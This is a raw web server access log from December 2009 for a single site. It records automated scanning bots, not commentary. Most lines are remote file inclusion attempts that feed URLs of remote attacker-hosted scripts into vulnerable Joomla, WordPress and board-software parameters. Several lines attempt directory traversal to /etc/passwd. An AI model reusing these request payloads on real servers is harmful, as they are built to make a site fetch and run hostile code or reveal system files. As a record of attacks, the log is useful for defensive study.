193.200.255.18 - - [01/Dec/2009:13:22:07 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:13:22:28 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:13:22:28 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:13:22:28 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.126.127.34 - - [01/Dec/2009:13:22:44 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.126.127.34 - - [01/Dec/2009:13:22:44 -0800] "GET /logs/access_090801.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.126.127.34 - - [01/Dec/2009:13:22:44 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [01/Dec/2009:13:22:45 -0800] "GET /logs/access_090501.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:13:22:45 -0800] "GET /logs/access_090801.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
70.38.31.183 - - [01/Dec/2009:13:22:51 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
70.38.31.183 - - [01/Dec/2009:13:22:56 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.126.127.34 - - [01/Dec/2009:13:22:56 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
70.38.31.183 - - [01/Dec/2009:13:22:56 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.126.127.34 - - [01/Dec/2009:13:22:56 -0800] "GET /logs/access_090801.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.126.127.34 - - [01/Dec/2009:13:22:56 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.126.127.34 - - [01/Dec/2009:13:23:27 -0800] "GET /logs/access_090501.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.126.127.34 - - [01/Dec/2009:13:23:28 -0800] "GET /logs/access_090501.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
70.38.31.183 - - [01/Dec/2009:13:23:44 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
70.38.31.183 - - [01/Dec/2009:13:23:44 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
70.38.31.183 - - [01/Dec/2009:13:23:44 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
70.38.31.183 - - [01/Dec/2009:13:23:47 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
70.38.31.183 - - [01/Dec/2009:13:23:47 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
70.38.31.183 - - [01/Dec/2009:13:23:48 -0800] "GET /logs/access_090801.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
91.121.14.194 - - [01/Dec/2009:13:24:38 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.kjf-holzminden.de/downloads/nat.jpg?? HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.wirama.com"
91.121.14.194 - - [01/Dec/2009:13:24:38 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.kjf-holzminden.de/downloads/nat.jpg?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.wirama.com"
75.126.127.34 - - [01/Dec/2009:13:24:43 -0800] "GET /logs/access_090501.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.126.127.34 - - [01/Dec/2009:13:24:53 -0800] "GET /logs/access_090501.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
70.38.31.183 - - [01/Dec/2009:13:25:52 -0800] "GET /logs/access_090501.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
91.186.11.35 - - [01/Dec/2009:13:26:14 -0800] "GET /logs/access_090501.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://marmelad-card.com.ua/userfiles/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.wirama.com"
91.186.11.35 - - [01/Dec/2009:13:26:14 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://marmelad-card.com.ua/userfiles/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.wirama.com"
91.186.11.35 - - [01/Dec/2009:13:26:14 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://marmelad-card.com.ua/userfiles/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:13:27:47 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:13:27:47 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:13:27:47 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:13:27:52 -0800] "GET /logs/access_090801.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:13:27:52 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:13:27:52 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
70.38.31.183 - - [01/Dec/2009:13:28:03 -0800] "GET /logs/access_090501.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:13:28:44 -0800] "GET /logs/access_090501.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:13:29:37 -0800] "GET /logs/access_090501.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:13:30:08 -0800] "GET /logs/access_090801.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:13:30:16 -0800] "GET /logs/access_090801.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
91.186.11.35 - - [01/Dec/2009:13:30:23 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://marmelad-card.com.ua/userfiles/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "wirama.com"
91.186.11.35 - - [01/Dec/2009:13:30:23 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://marmelad-card.com.ua/userfiles/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "wirama.com"
91.186.11.35 - - [01/Dec/2009:13:32:04 -0800] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://marmelad-card.com.ua/userfiles/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "wirama.com"
91.186.11.35 - - [01/Dec/2009:13:32:04 -0800] "GET /logs/access_090701.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://marmelad-card.com.ua/userfiles/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "wirama.com"
205.234.184.42 - - [01/Dec/2009:13:35:44 -0800] "GET /logs/access_090329.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://marmelad-card.com.ua/userfiles/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.wirama.com"
205.234.184.42 - - [01/Dec/2009:13:35:44 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://marmelad-card.com.ua/userfiles/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.wirama.com"
205.234.184.42 - - [01/Dec/2009:13:35:44 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://marmelad-card.com.ua/userfiles/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.wirama.com"
195.22.14.131 - - [01/Dec/2009:13:37:36 -0800] "GET /file_includer.php?gzip=0&file=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "wirama.com"
195.22.14.131 - - [01/Dec/2009:13:37:36 -0800] "GET /file_includer.php?gzip=0&file=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "wirama.com"
195.22.14.131 - - [01/Dec/2009:13:52:22 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "wirama.com"
195.22.14.131 - - [01/Dec/2009:13:52:22 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "wirama.com"
91.186.11.35 - - [01/Dec/2009:13:55:14 -0800] "GET /logs/access_090501.log%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://marmelad-card.com.ua/userfiles/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.wirama.com"
129.7.107.93 - - [01/Dec/2009:13:58:58 -0800] "GET /logs/access_090329.log HTTP/1.1" 200 1685256 "-" ".NET Framework/2.0" "wirama.com"
87.139.66.104 - - [01/Dec/2009:14:00:43 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
87.139.66.104 - - [01/Dec/2009:14:00:43 -0800] "GET /logs/access_090401.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
87.139.66.104 - - [01/Dec/2009:14:00:43 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
205.234.184.42 - - [01/Dec/2009:14:00:48 -0800] "GET /logs/access_090329.log%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://marmelad-card.com.ua/userfiles/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.wirama.com"
87.139.66.104 - - [01/Dec/2009:14:01:36 -0800] "GET /logs/access_090731.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.114.220.160 - - [01/Dec/2009:14:42:21 -0800] "GET /////?_zb_path=http://kb27.co.kr/bbs///data/cok.txt?? HTTP/1.1" 200 919 "-" "libwww-perl/5.79" "www.wirama.com"
219.94.131.182 - - [01/Dec/2009:14:47:33 -0800] "GET /////?_zb_path=http://www.lamer.or.kr/public/zboard/id1.txt? HTTP/1.1" 200 919 "-" "Mozilla/5.0" "www.wirama.com"
219.94.131.182 - - [01/Dec/2009:14:47:33 -0800] "GET /logs//////?_zb_path=http://www.lamer.or.kr/public/zboard/id1.txt? HTTP/1.1" 200 3521 "-" "Mozilla/5.0" "www.wirama.com"
219.94.131.182 - - [01/Dec/2009:14:47:33 -0800] "GET /logs/access_090329.log%20%20//////?_zb_path=http://www.lamer.or.kr/public/zboard/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.139.66.104 - - [01/Dec/2009:14:59:02 -0800] "GET /logs/access_090701.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
87.139.66.104 - - [01/Dec/2009:14:59:02 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
87.139.66.104 - - [01/Dec/2009:14:59:02 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
87.139.66.104 - - [01/Dec/2009:14:59:11 -0800] "GET /logs/access_090731.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [01/Dec/2009:15:01:25 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
92.50.143.90 - - [01/Dec/2009:15:01:25 -0800] "GET /logs/access_090329.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
92.50.143.90 - - [01/Dec/2009:15:01:25 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
92.50.143.90 - - [01/Dec/2009:15:01:33 -0800] "GET /logs/access_090330.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
92.50.143.90 - - [01/Dec/2009:15:01:46 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
92.50.143.90 - - [01/Dec/2009:15:01:46 -0800] "GET /logs/access_090329.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
92.50.143.90 - - [01/Dec/2009:15:01:46 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
92.50.143.90 - - [01/Dec/2009:15:01:53 -0800] "GET /logs/access_090330.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
92.50.143.90 - - [01/Dec/2009:15:02:31 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
92.50.143.90 - - [01/Dec/2009:15:02:31 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
92.50.143.90 - - [01/Dec/2009:15:02:31 -0800] "GET /logs/access_090501.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
92.50.143.90 - - [01/Dec/2009:15:02:42 -0800] "GET /logs/access_090329.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
92.50.143.90 - - [01/Dec/2009:15:03:22 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [01/Dec/2009:15:03:22 -0800] "GET /logs/access_090501.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
92.50.143.90 - - [01/Dec/2009:15:03:22 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
114.108.177.238 - - [01/Dec/2009:15:10:10 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://anginbali.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
114.108.177.238 - - [01/Dec/2009:15:10:11 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://anginbali.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
114.108.177.238 - - [01/Dec/2009:15:10:11 -0800] "GET /logs/access_090330.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://anginbali.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.45.167.247 - - [01/Dec/2009:15:13:00 -0800] "GET /logs/access_090501.log%20%20/errors.php?error=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.45.167.247 - - [01/Dec/2009:15:13:00 -0800] "GET /logs/errors.php?error=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.45.167.247 - - [01/Dec/2009:15:13:00 -0800] "GET /errors.php?error=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
74.86.17.106 - - [01/Dec/2009:15:13:11 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.detroitbargainhomes.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.86.17.106 - - [01/Dec/2009:15:13:11 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.detroitbargainhomes.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.86.17.106 - - [01/Dec/2009:15:13:11 -0800] "GET /logs/access_090601.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.detroitbargainhomes.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.114.220.160 - - [01/Dec/2009:15:13:12 -0800] "GET /?_zb_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
210.114.220.160 - - [01/Dec/2009:15:13:12 -0800] "GET /logs/access_090601.log//?_zb_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.114.220.160 - - [01/Dec/2009:15:13:12 -0800] "GET /logs//?_zb_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 200 3517 "-" "Mozilla/5.0" "wirama.com"
61.110.22.144 - - [01/Dec/2009:15:14:19 -0800] "GET /logs/access_090501.log%20%20/errors.php?error=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
61.110.22.144 - - [01/Dec/2009:15:14:19 -0800] "GET /errors.php?error=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
61.110.22.144 - - [01/Dec/2009:15:14:19 -0800] "GET /logs/errors.php?error=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.114.220.160 - - [01/Dec/2009:15:14:59 -0800] "GET /logs//?_zb_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 200 3517 "-" "Mozilla/5.0" "wirama.com"
210.114.220.160 - - [01/Dec/2009:15:14:59 -0800] "GET /logs/access_090601.log//?_zb_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.114.220.160 - - [01/Dec/2009:15:14:59 -0800] "GET /?_zb_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
74.54.223.100 - - [01/Dec/2009:15:15:12 -0800] "GET /rgboard/include/bbs.lib.inc.php?site_path=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.54.223.100 - - [01/Dec/2009:15:15:12 -0800] "GET /logs/rgboard/include/bbs.lib.inc.php?site_path=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.54.223.100 - - [01/Dec/2009:15:15:12 -0800] "GET /logs/access_090501.log/rgboard/include/bbs.lib.inc.php?site_path=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.45.167.247 - - [01/Dec/2009:15:15:51 -0800] "GET /errors.php?error=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.45.167.247 - - [01/Dec/2009:15:15:51 -0800] "GET /logs/errors.php?error=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.45.167.247 - - [01/Dec/2009:15:15:51 -0800] "GET /logs/access_090331.log/errors.php?error=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.45.167.247 - - [01/Dec/2009:15:15:51 -0800] "GET /logs/access_090329.log/errors.php?error=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
